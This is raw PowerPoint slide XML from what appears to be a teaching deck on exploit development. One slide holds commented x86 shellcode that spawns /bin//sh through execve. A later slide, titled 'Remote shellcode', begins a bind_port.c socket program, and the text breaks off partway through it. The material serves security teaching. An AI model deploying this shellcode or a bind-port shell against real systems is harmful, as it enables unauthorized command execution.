              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> char *filename, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [], char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Make sure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is zeroed again.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> al, 11        ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; push some nulls for string termination.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push 0x68732f2f   ; push "//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" to the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push 0x6e69622f   ; push "/bin" to the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Put the address of "/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> via esp.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; push 32-bit null terminator to stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; This is an empty array for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; push string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to stack above null terminator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; This is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> array with string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", ["/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", NULL], [NULL])</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154437853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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bind_port.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1551220"/>
            <a:ext cx="7704856" cy="4706417"/>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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;sys/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socket.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netinet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>in.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inet.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new_sockfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;  // Listen on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sock_fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, new connection on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new_fd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr_in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
